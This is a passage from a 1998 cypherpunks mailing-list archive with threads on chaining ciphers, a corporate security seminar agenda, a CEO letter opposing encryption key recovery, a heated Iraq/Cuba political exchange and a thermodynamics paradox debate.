magic number or other identification at the beginning (e.g. encrypted
PKZIP) or will do a sanity check that actually tells you whether you've
decrypted with the right key, whether you see garbage or not (e.g.
EAY's stand-alone 'idea', 'des', etc.).  PGP also has distinctive headers,
I think.

In the world of existing cipher packages it's usually possible to tell what
you've got.  Assume Kerckhoff's principle, of course: the attacker knows
which packages you're using and which order you're doing them in.

	Jim Gillogly
	Hevensday, 9 Solmath S.R. 1998, 17:52
	12.19.4.15.19, 10 Cauac 17 Muan, Fourth Lord of Night





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "=?KOI8-R?Q?=EF=E5=ED_=F0=CF=CC=D8=DA=CF=D7=C1=D4=C5=CC=D8?=" <kes21@chat.ru>
Date: Fri, 30 Jan 1998 22:01:07 +0800
To: <cypherpunks@toad.com>
Subject: Re: Programming
Message-ID: <199801301344.QAA19746@chat.ru>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3988.1071713774.multipart/mixed"

--Boundary..3988.1071713774.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Dear  Cyberpunks !!
I  have just    sent  this  letter   and  i do not   what to   do   i   
would  like   to become a very
good  programmer   and  i don't   know  where i must   start   from  so   
be so  kind   and  send   me  any  letters  if  you can  about    basics in
 
programming   with  Assembler 
Good Bye!!!
my  email: kes21@chat.ru

--Boundary..3988.1071713774.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Billy Brittingham <wbritt@ctp.com>
Date: Sat, 31 Jan 1998 03:49:10 +0800
To: mhunz@ctp.com
Subject: Hackers Invade Houston - Houston Hacker Tour
In-Reply-To: <68tu02$754$1@news1.bu.edu>
Message-ID: <34D22812.C7172E22@ctp.com>
MIME-Version: 1.0
Content-Type: text/plain



The Houston Hacker Tour

Houston                March 3-4, 1998


Okay, you convinced your organization to embrace an open systems
environment. You assured everyone that you and your colleagues were on top
of thesecurity angle and you've make great strides.  So why are you still
nervous?

Because paranoia and vigilance are the heart and soul of corporate
security. And, whether you're a CIO or a security analyst, whether you
manage your organization's entire security strategy or a small piece of
it, you know the threats.  You know there are countless points of
vulnerability.  You know a breach at any one of those points could be
crippling.  You know "100% secure" is a myth.

Unfortunately, they know too - the people lurking outside your firewall,
the people tapping into your phone lines, the people diving into your
dumpsters. They're patient. They're persistent.  And they'll find a way in
if you let your guard down.

You know you can't eliminate vulnerability, but you can reduce it.  The
question is, how?

Find the answers at this interactive two-day session where Cambridge
Technology Partners will introduce you to the enemy, their methodologies,
and the steps you can take to protect your enterprise.


What IS IT?
Cambridge Technology Partners is pleased to present the New Hack Tour, a
two-day "get-smart" session where you can go head-to-head with leading
security analysts, security practitioners, and yes, hackers.  Together,
you'll explore liability issues and organizational behaviors, learn
underground tools of the hacker trade, and discuss attack strategies and
detection/protection methodologies.


WHO SHOULD ATTEND?
Security touches everyone in your organization - from the ground floor of
ITto the executive suite.  Cambridge recognizes this.  The New Hack Tour
is uniquely designed for diverse audiences - from technical engineers and
system architects to CIOs.  In fact, the tour features two tracks, one for
the people battling in the network trenches and one for the people who own
overall security strategy and are battling to improve it.


HOW DOES IT WORK?
During the session, participants from across the corporate landscape will:

*      Day One:  Address - in one of two tracks - the micro- or
macro-level
security issues that directly impact their organizations and their
careers.

*      Day Two:  Collaborate with hackers in one comprehensive track to
build new
and more effective models of corporate security.


Day One AGENDA

Track One
*      Setting the Scene
*      Why is Security Important?
*      Who are the Players (Hackers, Crackers, and Phone Phreaks)?
*      Is Security Futile?
*      What's at Stake? Addressing Liability
*      Case Study:  Anatomy of an Internet Crime
*      Identify and Discuss Your Security Nightmares
*      Case Study:  Anatomy of a Corporate Security Plan

Day ONE AGENDA
Track Two
*      Setting the Scene
*      Why is Security Important?
*      Who are the Players (Hackers, Crackers, and Phone Phreaks)?
*      Is Security Futile?
*      Identifying the Holes: A Primer on TCP/IP and O/S Internals
*      Underground Tools
*      Attack Strategies
*      Detection and Protection

Day two AGENDA

Tracks One & Two

Meet the Enemy Panel

Enemy Perspective: The State of Corporate Insecurity

Point and Counterpoint: Participant Driven Q&A with the Enemy Panel

Silicon-Based Security Solutions: Architectures, Technologies, and Tools

Carbon-Based Security Solutions: Organizational Structures and Behaviors


PROGRAM FEES & REGISTRATION
Program fees are $995 covering registration, program materials,
continental
breakfasts, breaks, and lunches.  For more information or to register,
contact:

Billy Brittingham
Cambridge Technology Partners
304 Vassar Street
Cambridge, MA  02139
617-374-8580
wbritt@ctp.com


ABOUT CAMBRIDGE TECHNOLOGY PARTNERS
Cambridge Technology Partners is an international management consulting
and
systems integration firm.  Our unique approach has fundamentally
reinvented
the way business solutions are delivered.  We combine strategic
consulting,
IT strategy, process innovation and implementation, custom and package
software deployment, network services, and training to rapidly deliver
end-to-end business systems that create immediate bottom-line impact for
our
clients.  We do it fast.  We do it for a fixed price.  And we do it on
time.




TIMED AGENDA - HOUSTON

Tuesday, March 3
   9:00 - 9:15 Welcome & Introductory Remarks
                       Mike Hunziker, Cambridge Technology Partners
 9:15 - 10:30  Opening Level-Set
*      Why is Security Important?
*      Who are the players (i.e. hackers, crackers, phone phreaks)?
*      Is Security Futile?
Yobie Benjamin, Cambridge Technology Partners
10:30 - 10:45  Break

Track One
 11:00 - 12:00  What's At Stake?  Liability And Legal Issues Addressed
                       James Asperger, Esq. and Christine C. Ewell, Esq.,
O'Melveny and Myers
  12:00 - 1:00 Lunch
    1:00 - 2:00        Case Study: Anatomy of an Internet Crime
                       TBD Agent, F.B.I.
    2:00 - 2:45        Case Study: Internet Security and the Banking
Industry
                       Anita Ward, Senior Vice President, TCB/Chase
Manhattan
    2:45 - 3:00        Break
    3:00 - 3:45        Breakout Exercise - Top Ten Security Nightmares
    3:45 - 4:15        Report Backs & Discussion
    4:15 - 5:00        Case Study: VISA International
                             Bobby Colquitt, Vice President, VISA
International
    5:00               Adjourn

Track Two
10:45 - 12:15  Identifying the Holes: A Brief Primer on TCP/IP and O/S
Internals
Peter Shipley, Network Security Associates

  12:15 - 1:15 Lunch
    1:15 - 2:45        Underground Tools and the Attack
                       Marc Fabro, Secure Computing

    2:45 - 3:00        Break

    3:00 - 5:00        Detection and Protection
                       Bob Keyes,  Cambridge Technology Partners
                       Peter Shipley, Network Security Associates

    5:00               Adjourn

Wednesday, March 4
    9:00 - 9:30        Meet the Enemy Panel
                       Wyatt Earp, B$tring, Yobie Benjamin, Peter Shipley,
Dr. Who

  9:30 - 10:30 Enemy Perspectives: The State of Corporate [In]Security
                       Wyatt Earp, B$tring, Dr. Who, Benjamin, Shipley

10:30 - 10:45  Break

10:45 - 12:00  Point & Counterpoint: Participant Driven Q&A With Enemy
Panel
                       Wyatt Earp, B$tring, Benjamin, Dr. Who, Shipley

  12:00 - 1:00 Lunch
    1:00 - 2:30        Silicon-Based Security Solutions: Architectures,
Technologies & Tools - Marc Fabro, Secure Computing
    2:30 - 2:45        Break
    2:45 - 3:45        Carbon-Based Solutions:  Organizational Behavior
and Structure

Phillip Parker, Former Director for Counter-Intelligence, FBI

    3:45 - 4:15        Closing Thoughts
                       Mike Hunziker, Cambridge Technology Partners









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@temp0201.myriad.ml.org (Matthew Ghio)
Date: Sat, 31 Jan 1998 00:56:06 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Chaining ciphers
In-Reply-To: <9801291747.AA26773@mentat.com>
Message-ID: <199801301645.LAA15149@myriad>
MIME-Version: 1.0
Content-Type: text/plain



Jim Gillogly wrote:

> Yes, that's definitely better for high-confidence long-term archival
> stuff than relying on one cipher.  Carl Ellison's suggestion was DES |
> tran | nDES | tran | DES, where "tran" is an unkeyed large-block
> transposition.

One other possibility is to encrypt with plaintext block chaining, then
superencrypt it PBC in reverse order, starting with the last block first.
An attacker would thus have to decrypt the entire message before knowing
whether the key was correct or not.

> One word of caution (which should be obvious, but can't hurt to repeat it):
> if you chain ciphers (e.g. DES | IDEA | 3DES | CAST | Blowfish), be sure to
> use separate keys for each of them; otherwise breaking the last one will
> give the key to the whole lot.

Only if the cryptanalyst knows that the decryption of the last one was
correct, which shouldn't be possible without also decrypting all the other
layers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 31 Jan 1998 06:21:51 +0800
To: cypherpunks@toad.com
Subject: FC: Letter from high-tech CEOs to Feinstein: back off!
Message-ID: <3.0.5.32.19980130140759.00843bf0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded from Declan's list
>From: Declan McCullagh <declan@well.com>
>Subject: FC: Letter from high-tech CEOs to Feinstein: back off!
>X-URL: Politech is at http://www.well.com/~declan/politech/
>
>===
>
> January 15, 1998
>>
>>
>> The Honorable Dianne Feinstein
>> United States Senate
>> Washington, DC  21510
>>
>>
>>  Dear Senator Feinstein,
>>
>> As Chief Executive Officers of leading California companies, we were
>> disappointed by your
>> November 5 comments at a Senate Judiciary Committee hearing implying
>> that
>> California companies
>> are ambivalent regarding your position on encryption policy. We are
>> anything but
>> ambivalent about an
>> issue that will have a profound impact on our companies, our
>> customers, the
>> citizens of our country,
>> and our nation itself.
>>
>> We are in the midst of a transformation of our society into an era
>> where
>> information technology is
>> affecting and improving all of our lives and all of our businesses.
>> Without
>> effective security we put
>> at risk the confidentiality of our intellectual property, the public's
>> privacy
>> and the nation's critical
>> infrastructure.  And none of us will be able to take full advantage of
>> the
>> opportunities being presented
>> to us by the promise of global electronic commerce.
>>
>> And consider the burgeoning threat of personal identity theft.  As
>> emphasized in
>> the September 1997
>> issue of Consumer Reports, "the crime is one of the fastest-growing in
>> the
>> nation, according to the
>> California District Attorneys Association.   Identity thieves make off
>> with
>> billions of dollars a year...."
>> Strong encryption with no systemic vulnerability is the best
>> protection against
>> such damaging fraud.
>> Indeed, the credit-card industry, as you heard in testimony before the
>> Judiciary
>> Subcommittee on
>> Terrorism and Technology on September 3, soon will be offering
>> publicly a very
>> sophisticated system
>> for secure credit-card transactions over the Internet.  While the
>> system will be
>> able to reconstruct
>> transactions soon after the fact in response to legitimate
>> law-enforcement
>> requests, it does not employ
>> keys and would not comply with the kind of mandate contemplated by the
>> FBI.
>>
>> Mandatory key recovery policies, domestically and for export, will
>> make the
>> United States a second
>> class nation in the Information Age.
>>
>> We are very sympathetic to the concerns of law enforcement, and we
>> greatly
>> respect your continuing
>> support for them.  In fact, if we believed that the policy of
>> mandatory key
>> recovery could successfully
>> prevent criminals from having access to unbreakable encryption, we
>> might support
>> that position.
>> However, this policy cannot succeed, and in the process of failing it
>> will
>> sacrifice the leading role that
>> the State of California is playing in the international economy.  Even
>> more
>> important, perhaps, the
>> policy will create new law enforcement and national security
>> challenges because
>> U.S. corporations and
>> government officials will be forced to rely on unproven foreign
>> encryption
>> technology.  Maintaining
>> United States leadership in the development of state-of-the-art
>> cryptography is
>> in the best interests of
>> U.S. national security and law enforcement.  California companies and
>> industries
>> nationwide are
>> united in opposition to domestic and export controls that jeopardize
>> this
>> leadership.
>>
>> California companies need your support to be able to meet this new day
>> with a
>> strong and competitive
>> encryption industry.  We urge you to meet regularly with
>> representatives from
>> our companies, in
>> Washington D.C. and in California, to discuss this issue further.
>>
>> Sincerely,
>>
>>
>> Christopher Allen
>> President and CEO
>> Consensus Development Corporation
>>
>> Bill Archey
>> CEO
>> American Electronics Association
>>
>> Jim Barksdale
>> CEO
>> Netscape Communications, Inc.
>>
>> Carol Bartz
>> CEO
>> Autodesk, Inc.
>>
>> George Bell
>> CEO
>> Excite, Inc.
>>
>> Eric Benhamou
>> Chairman and CEO
>> 3Com Corporation
>>
>> Jim Bidzos
>> CEO
>> RSA Data Security, Inc.
>>
>> Philip Bowles
>> President
>> Bowles Farming Co., Inc.
>>
>> Steve Case
>> Chairman and CEO
>> America Online, Inc.
>>
>> Wilfred J. Corrigan
>> Chairman and CEO
>> LSI Logic
>>
>> Thomas B. Crowley
>> President & CEO
>> Crowley Maritime Corporation
>>
>> Philip Dunkelberger
>> CEO
>> PGP
>>
>> Judy Estrin
>> President & CEO
>> Precept Software, Inc.
>>
>> David W. Garrison
>> CEO
>> Netcom On-Line Communication Services, Inc.
>>
>> Karl Geng
>> President and CEO
>> Siemens Business Communication Systems, Inc.
>> Santa Clara, Calif.
>>
>> Charles M. Geschke
>> President
>> Adobe Systems, Inc.
>>
>> Brian L. Halla
>> President, Chairman & CEO
>> National Semiconductor, Inc.
>>
>> Gordon Mayer
>> CEO and Chairman
>> Geoworks Corporation
>>
>> Scott McNealy
>> Chairman and CEO
>> Sun Microsystems, Inc.
>>
>>
>>
>> Ed Mueller
>> Predident and CEO
>> Pacific Bell
>>
>> Kenneth J. Orton
>> President and CEO
>> Preview Travel, Inc.
>>
>> Willem P. Roelandts
>> CEO
>> Xilinx, Inc.
>>
>> Eric Schmidt
>> CEO
>> Novell, Inc.
>>
>> Tom Steding
>> CEO
>> Red Creek
>>
>> Deb Triant
>> CEO
>> Checkpoint
>>
>> David E. Weiss
>> Chairman, President and CEO
>> Storage Technology Corporation
>>
>>
>>
>>
>>
>
>
>--------------------------------------------------------------------------
>POLITECH -- the moderated mailing list of politics and technology
>To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
>subscribe politech
>More information is at http://www.well.com/~declan/politech/
>--------------------------------------------------------------------------
>
>
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sat, 31 Jan 1998 05:56:18 +0800
To: cypherpunks@cyberpass.net
Subject: US Tried Same Tricks With Cuba
Message-ID: <199801302140.PAA13031@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



While the US Government tries to whip up public opinion for the mass
murder of more Iraqis, filling the press with inflammatory statements,
most of which are based on no new information, and the inability to
prove negatives, newly declassified records demonstrate that such
antics have been used by the government before.
 
Should the US, claiming to represent "the will of the whole world,"
launch an unprovoked military strike against Iraq, based on some vague
claim that Iraq has not had its industrial infrastructure disemboweled
to the point where it will never again be able to perform even the
simplest chemical or biological laboratory work, I would hope that all
thinking non-sheep in this country would avail themselves of every
covert opportunity to monkey-wrench the US War Machine.
 
UN economic sanctions demanded by the US against Iraq have already
directly resulted in the deaths of over 1,000,000 Iraqis of all ages.
 
-----
 
WASHINGTON (AP) -- America's military leaders signed off on a scheme
in 1963 to provoke Fidel Castro into attacking the United States so
that retaliating U.S. forces could squash him ``with speed, force and
determination,'' newly declassified records show.
 
The records were among 600 pages opened at the National Archives by a
government agency, the Assassination Records Review Board, to help
researchers into John F. Kennedy's Nov. 22, 1963, assassination
explore the possibility of a Cuban connection and to ``put the
assassination into its historical context.''
 
Some Cuban involvement has been theorized because of slain suspect Lee
Harvey Oswald's association with the Fair Play for Cuba Committee.
 
``These military records further demonstrate how high on the U.S.
government's radar screen getting rid of the Castro government was in
the early 1960s,'' said John R. Tunheim, a federal judge in Minnesota
and the board's chairman.
 
The documents showed that in February 1962 the Joint Chiefs of Staff
and Deputy Defense Secretary Roswell Gilpatric approved a plan to
``lure or provoke Castro, or an uncontrollable subordinate, into an
overt hostile reaction against the United States.''
 
The attack ``would in turn create the justification for the U.S. to
not only retaliate but destroy Castro with speed, force and
determination,'' the memo said.
 
It was not clear where along the chain of command the plan eventually
was squelched.
 
But by the following year, another Pentagon policy paper discussed a
new scheme to make it appear that Cuba had attacked a member of the
Organization of American States so that the United States could
retaliate.
 
Five scenarios were spelled out, foreseeing either real or faked Cuban
attacks on a U.S. ally.
 
One of them: ``A contrived 'Cuban' attack on an OAS member could be
set up, and the attacked state could be urged to take measures of
self-defense and request assistance from the U.S. and OAS.''
 
The paper expressed confidence that ``the U.S. could almost certainly
obtain the necessary two-thirds support among OAS members for
collective action against Cuba.''
 
The planners got cold feet, the documents show. They feared leaks.
 
``Any of the contrived situations described above are inherently,
extremely risky in our democratic system in which security can be
maintained, after the fact, with very great difficulty,'' a memo said.
 
``If the decision should be made to set up a contrived situation, it
should be one in which participation by U.S. personnel is limited only
to the most high trusted covert personnel.''
 
The documents were the second set about Washington's preoccupation
with getting rid of Castro to be made public by the board. Late last
year, 1,500 pages showed that military planners had come up with a
variety of dirty tricks intended to harass or humiliate Castro.
 
One prescribed flooding Cuba with faked photos of an overweight Castro
``with two beauties'' and ``a table brimming over with the most
delectable Cuban food'' to make the point that Castro's lifestyle was
richer than that of most Cubans.
 
In the new set of papers, one prepared by the Defense Department's
Caribbean Survey Group and dated Feb. 19, 1962, wanted to make Castro
so fearful of an imminent U.S. attack that he would call up the Cuban
militia. The purpose was ``a complete disruption of the available
labor force'' for the 1962 sugar cane harvest.
 
Another, a psychological warfare proposal dated Feb. 12, 1963,
proposed the creation of an imaginary Cuban resistance leader. The
paper called him ``our Cuban Kilroy.''
 
``After a period of time, all unexplained incidents and actions for
which credit has not been seized by some other exile group would
automatically be ascribed to our imaginary friend,'' the paper said.
``At some point in time it could be leaked that the U.S. is, in fact,
supporting this imaginary person.''
 
Eventually, the paper speculated, ``a member of the resistance in Cuba
may gain sufficient stature to assume or to be given the title of this
imaginary leader.''
 
The Pentagon documents were written after the disastrous April 1961
invasion of Cuba's Bay of Pigs by Cuban exiles trained, armed and
directed by the United States.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 31 Jan 1998 05:48:27 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Interesting Chemical Reaction (fwd)
Message-ID: <199801302143.PAA18723@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 30 Jan 1998 16:34:15 -0500
> From: ghio@temp0203.myriad.ml.org (Matthew Ghio)
> Subject: Re: Interesting Chemical Reaction

> > Because the thermodynamics assume a *closed* model. The base assumption of
> > your model is that it is closed. This means that not only the mirror, and
> > the two focii are in the system, but also the light source. When taken as a
> > whole the entropy is constant. Now if you allow the light to pass through
> > the mirror from outside an initial axiomatic assumption, a closed system,
> > is broken.
> 
> Assume that the mirrors completely surround the objects, and that the only
> light source is IR thermal radiation, and that the mirrors are insulated
> from the outsite world, so we can assume a closed system.
> 
> By the laws of optics, one focus should get warmer than the other, but by
> the law of entropy they must remain at the same temperature.  That's the
> paradox.

No, the total energy of the *system* stays constant, not individual
componants which are free to heat up or cool down as the energy in the
system is moved around. The total entropy of the lenses, the cold foci,
and the warm foci are what stays constant.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 31 Jan 1998 05:59:44 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Interesting Chemical Reaction (fwd)
Message-ID: <199801302155.PAA18887@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Interesting Chemical Reaction (fwd)
> Date: Fri, 30 Jan 1998 15:43:31 -0600 (CST)

> Forwarded message:
> 
> > Date: Fri, 30 Jan 1998 16:34:15 -0500
> > From: ghio@temp0203.myriad.ml.org (Matthew Ghio)
> > Subject: Re: Interesting Chemical Reaction
> 
> > > Because the thermodynamics assume a *closed* model. The base assumption of
> > > your model is that it is closed. This means that not only the mirror, and
> > > the two focii are in the system, but also the light source. When taken as a
> > > whole the entropy is constant. Now if you allow the light to pass through
> > > the mirror from outside an initial axiomatic assumption, a closed system,
> > > is broken.
> > 
> > Assume that the mirrors completely surround the objects, and that the only
> > light source is IR thermal radiation, and that the mirrors are insulated
> > from the outsite world, so we can assume a closed system.
> > 
> > By the laws of optics, one focus should get warmer than the other, but by
> > the law of entropy they must remain at the same temperature.  That's the
> > paradox.
> 
> No, the total energy of the *system* stays constant, not individual
> componants which are free to heat up or cool down as the energy in the
> system is moved around. The total entropy of the lenses, the cold foci,
> and the warm foci are what stays constant.

A couple of other points that I should have added. Your base assumption that
light and heat are not the same thing is faulty. They are in fact identical
so to speak of the 'law of optics' and the 'laws of thermodynamics' as
different things is in error.

What happens in the *real* world is that a point is reached where the amount
of energy emitted by each foci exactly balances the amount of energy
received by each foci. We in effect reach thermodynamic equilibrium, better
known as heat death. This term means that the minimal level of disorder has
been reached by the system under study and without outside intervention no
change, outside quantum fluctuations, will take place.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 31 Jan 1998 06:15:42 +0800
To: Eric Cordian <emc@wire.insync.net>
Subject: Re: US Tried Same Tricks With Cuba
In-Reply-To: <199801302140.PAA13031@wire.insync.net>
Message-ID: <199801302229.RAA13448@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199801302140.PAA13031@wire.insync.net>, on 01/30/98 
   at 03:40 PM, Eric Cordian <emc@wire.insync.net> said:

>While the US Government tries to whip up public opinion for the mass
>murder of more Iraqis, filling the press with inflammatory statements,
>most of which are based on no new information, and the inability to prove
>negatives, newly declassified records demonstrate that such antics have
>been used by the government before.
> 
>Should the US, claiming to represent "the will of the whole world,"
>launch an unprovoked military strike against Iraq, based on some vague
>claim that Iraq has not had its industrial infrastructure disemboweled to
>the point where it will never again be able to perform even the simplest
>chemical or biological laboratory work, I would hope that all thinking
>non-sheep in this country would avail themselves of every covert
>opportunity to monkey-wrench the US War Machine.
> 
>UN economic sanctions demanded by the US against Iraq have already
>directly resulted in the deaths of over 1,000,000 Iraqis of all ages.
> 

What a bunch of crap!

I suggest you go over to Iraq and talk to the Kurds who were slaughtered
in CBW attacks by the Iraq military (thanks Germany) and while you are
over there ask Iraq's neighbors what they think of them getting Nukes. If
it wasn't for the Israelie attack in '81-'82 he would have had the past 15
yrs to produce weapon grade uranium and plutonium (thanks France).

Grow-up! The world is a dangerious place with dangerious people in it.
Iraq is one of those places just like Cuba was back in the '60's.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: I love running Windows! NOT!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNNJBcI9Co1n+aLhhAQEq1AQAq6d03E74Zev76U6Cmsxa/yLIXDah1lTt
dLGZTnB8bhC1iL9kddVVAht/Zy1p2wMJ+9Nza6Ql5tUPE5dlG8A9Lu3/mklVsHjL
QxHqsK+IeuHg+wBxiPlrMhc3qiCdWvqm91RyM6kX0u7fFwlZMbiKdQEYZkeC4SRp
4k3VDXkJJh8=
=ZouU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Acosta <jacosta@americasttv.com>
Date: Sat, 31 Jan 1998 08:28:53 +0800
To: cypherpunks@cyberpass.net
Subject: Re: US Tried Same Tricks With Cuba
Message-ID: <3.0.32.19980130162208.0086fd00@pop.americasttv.com>
MIME-Version: 1.0
Content-Type: text/plain



Well

Well it was during Cuban Missile Crisis that the small pimple-sized 
Island brought us to the highest state of Def-Com ever (one level before
actually launching an attack).

At that point it time it was deadly serious; fortunately JFK and Krucheiv 
(sorry for murdering the spelling) where able to work something out and
avoid a catastrophe.

Joe Acosta

At 05:14 PM 1/30/98 -0600, Eric Cordian wrote:
>WHGIII writes:
>
>> Grow-up! The world is a dangerious place with dangerious people in it.
>> Iraq is one of those places just like Cuba was back in the '60's.
>
>Cuba is a pimple-sized island which in no way threatens the large
>continent next to it.
>
>-- 
>Eric Michael Cordian 0+
>O:.T:.O:. Mathematical Munitions Division
>"Do What Thou Wilt Shall Be The Whole Of The Law"
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@temp0203.myriad.ml.org (Matthew Ghio)
Date: Sat, 31 Jan 1998 05:48:18 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Interesting Chemical Reaction
In-Reply-To: <199801282322.RAA09923@einstein.ssz.com>
Message-ID: <199801302134.QAA24635@myriad>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

> Because the thermodynamics assume a *closed* model. The base assumption of
> your model is that it is closed. This means that not only the mirror, and
> the two focii are in the system, but also the light source. When taken as a
> whole the entropy is constant. Now if you allow the light to pass through
> the mirror from outside an initial axiomatic assumption, a closed system,
> is broken.

Assume that the mirrors completely surround the objects, and that the only
light source is IR thermal radiation, and that the mirrors are insulated
from the outsite world, so we can assume a closed system.

By the laws of optics, one focus should get warmer than the other, but by
the law of entropy they must remain at the same temperature.  That's the
paradox.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Roger J Jones" <cyber@ibpinc.com>
Date: Sat, 31 Jan 1998 07:01:27 +0800
To: <cypherpunks@cyberpass.net>
Subject: My apology
Message-ID: <199801302253.QAA19834@pc1824.ibpinc.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3988.1071713774.multipart/mixed"

--Boundary..3988.1071713774.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Tim, 
I stand corrected,
This must be 
Chem-Punks

Roger J. Jones


--Boundary..3988.1071713774.multipart/mixed
Content-Type: application/octet-stream; name="bin00001.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00001.bin"
Content-Description: "Roger John Jones (E-mail).vcf"

QkVHSU46VkNBUkQKVkVSU0lPTjoyLjEKTjpKb25lcztSb2dlcjs7OwpGTjpS
b2dlciBKb2huIEpvbmVzIChFLW1haWwpCk9SRzpJQlAsIGluYy47ClRJVExF
OlNlbmlvciBWaWNlIFByZXNpZGVudApURUw7V09SSztWT0lDRTooNDAyKSAy
NDEtMjUyMwpURUw7SE9NRTtWT0lDRTooNzEyKSAyMzktMTg2NQpURUw7Q0VM
TDtWT0lDRTooNzEyKSAyNTItNTA2NgpURUw7Q0FSO1ZPSUNFOig3MTIpIDI1
MS00NDEwClRFTDtQQUdFUjtWT0lDRTooNzEyKSAyNzctNTU4MApURUw7V09S
SztGQVg6KDQwMikgMjQxLTM2NDgKQURSO1dPUks6Ozs0MDE3IEdsZW4gT2Fr
cyBCbHZkO1Npb3V4IENpdHk7SUE7NTExMDQ7VW5pdGVkIFN0YXRlcyBvZiBB
bWVyaWNhCkxBQkVMO1dPUks7RU5DT0RJTkc9UVVPVEVELVBSSU5UQUJMRTo0
MDE3IEdsZW4gT2FrcyBCbHZkPTBEPTBBU2lvdXggQ2l0eSwgSUEgNTExMDQ9
MEQ9MEFVbml0ZWQgU3RhdGVzIG9mIEFtZXJpY2EKQURSO0hPTUU6Ozs0MDE3
IEdsZW4gT2FrcyBCbHZkO1Npb3V4IENpdHk7SUE7NTExMDQ7VW5pdGVkIFN0
YXRlcyBvZiBBbWVyaWNhCkxBQkVMO0hPTUU7RU5DT0RJTkc9UVVPVEVELVBS
SU5UQUJMRTo0MDE3IEdsZW4gT2FrcyBCbHZkPTBEPTBBU2lvdXggQ2l0eSwg
SUEgNTExMDQ9MEQ9MEFVbml0ZWQgU3RhdGVzIG9mIEFtZXJpY2EKRU1BSUw7
UFJFRjtJTlRFUk5FVDpjeWJlckBpYnBpbmMuY29tClJFVjoxOTk4MDEzMFQx
ODE5NTFaCkVORDpWQ0FSRAo=
--Boundary..3988.1071713774.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sat, 31 Jan 1998 07:27:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: US Tried Same Tricks With Cuba
In-Reply-To: <199801302229.RAA13448@users.invweb.net>
Message-ID: <199801302314.RAA13193@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



WHGIII writes:

> Grow-up! The world is a dangerious place with dangerious people in it.
> Iraq is one of those places just like Cuba was back in the '60's.

Cuba is a pimple-sized island which in no way threatens the large
continent next to it.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
